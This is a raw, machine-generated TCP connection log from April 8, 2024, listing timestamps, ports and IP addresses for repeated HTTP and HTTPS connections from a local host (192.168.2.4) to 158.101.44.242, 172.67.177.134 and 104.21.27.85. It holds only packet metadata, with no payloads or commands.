Apr 8, 2024 13:59:16.290956020 CEST	49739	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:16.290992022 CEST	443	49739	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:16.588903904 CEST	443	49739	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:16.589003086 CEST	443	49739	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:16.589046955 CEST	49739	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:16.589586020 CEST	49739	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:16.593166113 CEST	49737	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:16.594477892 CEST	49740	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:16.776196003 CEST	80	49740	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:16.776340961 CEST	49740	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:16.776511908 CEST	49740	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:16.785729885 CEST	80	49737	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:16.785831928 CEST	49737	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:16.955636978 CEST	80	49740	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:17.181565046 CEST	80	49740	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:17.182904005 CEST	49741	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:17.182935953 CEST	443	49741	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:17.183015108 CEST	49741	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:17.183271885 CEST	49741	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:17.183286905 CEST	443	49741	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:17.222132921 CEST	49740	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:17.440624952 CEST	443	49741	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:17.442293882 CEST	49741	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:17.442322016 CEST	443	49741	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:17.739309072 CEST	443	49741	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:17.739418983 CEST	443	49741	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:17.739479065 CEST	49741	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:17.739912033 CEST	49741	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:17.757127047 CEST	49742	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:17.937038898 CEST	80	49742	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:17.937133074 CEST	49742	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:17.937311888 CEST	49742	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:18.116170883 CEST	80	49742	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:18.119434118 CEST	80	49742	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:18.120605946 CEST	49743	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:18.120630980 CEST	443	49743	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:18.120693922 CEST	49743	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:18.121021032 CEST	49743	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:18.121027946 CEST	443	49743	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:18.159521103 CEST	49742	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:18.395477057 CEST	443	49743	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:18.397247076 CEST	49743	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:18.397268057 CEST	443	49743	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:18.699667931 CEST	443	49743	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:18.699812889 CEST	443	49743	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:18.699861050 CEST	49743	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:18.700406075 CEST	49743	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:18.705539942 CEST	49742	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:18.706899881 CEST	49744	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:18.886428118 CEST	80	49744	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:18.886548996 CEST	49744	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:18.886874914 CEST	49744	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:18.887924910 CEST	80	49742	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:18.888021946 CEST	49742	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:19.066397905 CEST	80	49744	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:19.564827919 CEST	80	49744	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:19.566276073 CEST	49745	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:19.566317081 CEST	443	49745	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:19.566405058 CEST	49745	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:19.566652060 CEST	49745	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:19.566667080 CEST	443	49745	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:19.612659931 CEST	49744	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:19.823273897 CEST	443	49745	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:19.824842930 CEST	49745	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:19.824868917 CEST	443	49745	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:20.122843027 CEST	443	49745	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:20.122951984 CEST	443	49745	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:20.123017073 CEST	49745	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:20.123471022 CEST	49745	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:20.126473904 CEST	49744	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:20.127545118 CEST	49746	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:20.307097912 CEST	80	49746	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:20.307256937 CEST	49746	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:20.307406902 CEST	49746	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:20.318993092 CEST	80	49744	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:20.319081068 CEST	49744	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:20.486895084 CEST	80	49746	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:22.049896002 CEST	80	49746	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:22.051014900 CEST	49747	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:22.051053047 CEST	443	49747	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:22.051115036 CEST	49747	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:22.051328897 CEST	49747	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:22.051340103 CEST	443	49747	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:22.097038031 CEST	49746	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:22.308262110 CEST	443	49747	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:22.309787035 CEST	49747	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:22.309803963 CEST	443	49747	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:22.609461069 CEST	443	49747	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:22.609613895 CEST	443	49747	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:22.609679937 CEST	49747	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:22.610192060 CEST	49747	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:22.613312960 CEST	49746	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:22.614454031 CEST	49748	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:22.792870998 CEST	80	49746	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:22.792932987 CEST	49746	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:22.793803930 CEST	80	49748	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:22.794889927 CEST	49748	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:22.795017958 CEST	49748	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:22.974023104 CEST	80	49748	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:22.974997044 CEST	80	49748	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:22.976326942 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:22.976356030 CEST	443	49749	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:22.976425886 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:22.976651907 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:22.976664066 CEST	443	49749	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:23.019191027 CEST	49748	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:23.235800028 CEST	443	49749	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:23.237504959 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:23.237549067 CEST	443	49749	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:23.534223080 CEST	443	49749	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:23.534336090 CEST	443	49749	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:23.534409046 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:23.535057068 CEST	49749	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:23.543961048 CEST	49748	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:23.545182943 CEST	49750	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:23.724642038 CEST	80	49750	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:23.724766016 CEST	49750	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:23.724900007 CEST	49750	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:23.729135990 CEST	80	49748	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:23.729202032 CEST	49748	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:23.904011011 CEST	80	49750	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:23.979584932 CEST	80	49750	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:23.980741978 CEST	49751	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:23.980777979 CEST	443	49751	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:23.980844021 CEST	49751	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:23.981087923 CEST	49751	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:23.981100082 CEST	443	49751	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:24.018981934 CEST	49750	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:24.238625050 CEST	443	49751	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:24.240109921 CEST	49751	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:24.240134001 CEST	443	49751	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:24.537631035 CEST	443	49751	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:24.537770033 CEST	443	49751	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:24.537815094 CEST	49751	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:24.538275957 CEST	49751	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:24.549909115 CEST	49750	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:24.733479023 CEST	80	49750	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:24.733527899 CEST	49750	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:24.957377911 CEST	49752	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:24.957402945 CEST	443	49752	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:24.957465887 CEST	49752	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:24.957950115 CEST	49752	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:24.957963943 CEST	443	49752	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:25.052992105 CEST	49753	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:25.232418060 CEST	80	49753	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:25.232496977 CEST	49753	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:25.232907057 CEST	49753	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:25.240914106 CEST	443	49752	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:25.240992069 CEST	49752	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:25.243304014 CEST	49752	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:25.243311882 CEST	443	49752	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:25.248492956 CEST	443	49752	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:25.250144958 CEST	49752	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:25.296231031 CEST	443	49752	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:25.411788940 CEST	80	49753	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:25.412451029 CEST	80	49753	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:25.415770054 CEST	49753	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:25.595873117 CEST	80	49753	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:25.643963099 CEST	49753	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:25.655805111 CEST	49754	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:25.655832052 CEST	443	49754	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:25.655893087 CEST	49754	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:25.660176039 CEST	49754	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:25.660192013 CEST	443	49754	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:25.917414904 CEST	443	49754	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:25.917489052 CEST	49754	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:25.919186115 CEST	49754	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:25.919194937 CEST	443	49754	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:25.919471025 CEST	443	49754	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:25.972059965 CEST	49754	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:25.974754095 CEST	49754	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:26.020242929 CEST	443	49754	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:26.225682974 CEST	443	49754	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:26.225841045 CEST	443	49754	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:26.225888968 CEST	49754	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:26.229142904 CEST	49754	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:26.232584000 CEST	49753	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:26.412240982 CEST	80	49753	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:26.414351940 CEST	49755	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:26.414378881 CEST	443	49755	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:26.414457083 CEST	49755	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:26.414752960 CEST	49755	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:26.414768934 CEST	443	49755	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:26.456442118 CEST	49753	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:26.672976971 CEST	443	49755	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:26.674753904 CEST	49755	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:26.674772978 CEST	443	49755	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:26.982806921 CEST	443	49755	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:26.982897997 CEST	443	49755	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:26.983012915 CEST	49755	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:26.983555079 CEST	49755	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:26.986457109 CEST	49753	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:26.987457037 CEST	49756	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:27.165350914 CEST	80	49753	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:27.166502953 CEST	80	49756	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:27.166580915 CEST	49753	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:27.166637897 CEST	49756	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:27.166821003 CEST	49756	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:27.345890999 CEST	80	49756	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:27.347781897 CEST	80	49756	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:27.349028111 CEST	49757	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:27.349066973 CEST	443	49757	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:27.349144936 CEST	49757	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:27.349396944 CEST	49757	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:27.349409103 CEST	443	49757	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:27.394048929 CEST	49756	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:27.605294943 CEST	443	49757	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:27.606873989 CEST	49757	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:27.606900930 CEST	443	49757	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:27.906156063 CEST	443	49757	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:27.906275034 CEST	443	49757	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:27.906337976 CEST	49757	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:27.906836987 CEST	49757	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:27.909960032 CEST	49756	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:27.910979986 CEST	49758	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:28.089853048 CEST	80	49758	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:28.089916945 CEST	49758	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:28.090043068 CEST	49758	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:28.096796989 CEST	80	49756	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:28.096846104 CEST	49756	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:28.268944979 CEST	80	49758	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:28.344739914 CEST	80	49758	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:28.348993063 CEST	49759	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:28.349034071 CEST	443	49759	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:28.349097013 CEST	49759	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:28.349322081 CEST	49759	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:28.349335909 CEST	443	49759	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:28.393971920 CEST	49758	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:28.905787945 CEST	443	49759	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:28.907465935 CEST	49759	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:28.907489061 CEST	443	49759	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:29.167756081 CEST	443	49759	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:29.167867899 CEST	443	49759	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:29.167980909 CEST	49759	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:29.168380022 CEST	49759	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:29.172868013 CEST	49760	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:29.356722116 CEST	80	49760	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:29.356827021 CEST	49760	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:29.356972933 CEST	49760	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:29.540359974 CEST	80	49760	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:29.675683022 CEST	80	49760	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:29.676903963 CEST	49761	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:29.676942110 CEST	443	49761	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:29.677100897 CEST	49761	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:29.677261114 CEST	49761	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:29.677273989 CEST	443	49761	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:29.726357937 CEST	49760	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:29.936289072 CEST	443	49761	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:29.937939882 CEST	49761	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:29.937963009 CEST	443	49761	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:30.235630989 CEST	443	49761	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:30.235735893 CEST	443	49761	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:30.235805035 CEST	49761	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:30.236318111 CEST	49761	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:30.239967108 CEST	49760	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:30.241128922 CEST	49762	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:30.420486927 CEST	80	49762	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:30.420645952 CEST	49762	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:30.422316074 CEST	49762	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:30.424971104 CEST	80	49760	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:30.425040960 CEST	49760	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:30.601413965 CEST	80	49762	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:30.639260054 CEST	80	49762	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:30.640650034 CEST	49763	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:30.640682936 CEST	443	49763	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:30.640774012 CEST	49763	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:30.641026020 CEST	49763	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:30.641042948 CEST	443	49763	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:30.690819979 CEST	49762	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:30.903064013 CEST	443	49763	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:30.904495955 CEST	49763	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:30.904515028 CEST	443	49763	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:31.201976061 CEST	443	49763	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:31.202084064 CEST	443	49763	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:31.202186108 CEST	49763	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:31.202639103 CEST	49763	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:31.207040071 CEST	49762	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:31.208081961 CEST	49764	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:31.386158943 CEST	80	49762	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:31.386219025 CEST	49762	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:31.387089014 CEST	80	49764	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:31.387159109 CEST	49764	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:31.387311935 CEST	49764	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:31.566435099 CEST	80	49764	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:31.569299936 CEST	80	49764	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:31.578598022 CEST	49765	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:31.578639984 CEST	443	49765	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:31.578720093 CEST	49765	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:31.578948975 CEST	49765	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:31.578959942 CEST	443	49765	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:31.612674952 CEST	49764	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:31.834628105 CEST	443	49765	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:31.836074114 CEST	49765	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:31.836100101 CEST	443	49765	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:32.133028030 CEST	443	49765	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:32.133162975 CEST	443	49765	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:32.133214951 CEST	49765	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:32.140904903 CEST	49765	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:32.145245075 CEST	49764	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:32.145872116 CEST	49766	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:32.324309111 CEST	80	49764	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:32.324404955 CEST	49764	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:32.324598074 CEST	80	49766	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:32.324665070 CEST	49766	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:32.324795961 CEST	49766	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:32.503696918 CEST	80	49766	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:32.504470110 CEST	80	49766	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:32.550175905 CEST	49766	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:34.130407095 CEST	49767	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:34.130445957 CEST	443	49767	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:34.130669117 CEST	49767	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:34.131031036 CEST	49767	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:34.131046057 CEST	443	49767	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:34.391159058 CEST	443	49767	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:34.392838001 CEST	49767	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:34.392865896 CEST	443	49767	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:34.690457106 CEST	443	49767	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:34.690562010 CEST	443	49767	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:34.690634966 CEST	49767	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:34.691212893 CEST	49767	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:34.698016882 CEST	49766	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:34.698827982 CEST	49768	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:34.698860884 CEST	443	49768	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:34.698986053 CEST	49768	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:34.699342966 CEST	49768	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:34.699359894 CEST	443	49768	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:34.876996040 CEST	80	49766	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:34.877084017 CEST	49766	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:34.960040092 CEST	443	49768	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:34.960156918 CEST	49768	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:34.961618900 CEST	49768	443	192.168.2.4	104.21.27.85
Apr 8, 2024 13:59:34.961626053 CEST	443	49768	104.21.27.85	192.168.2.4
Apr 8, 2024 13:59:34.961901903 CEST	443	49768	104.21.27.85	192.168.2.4
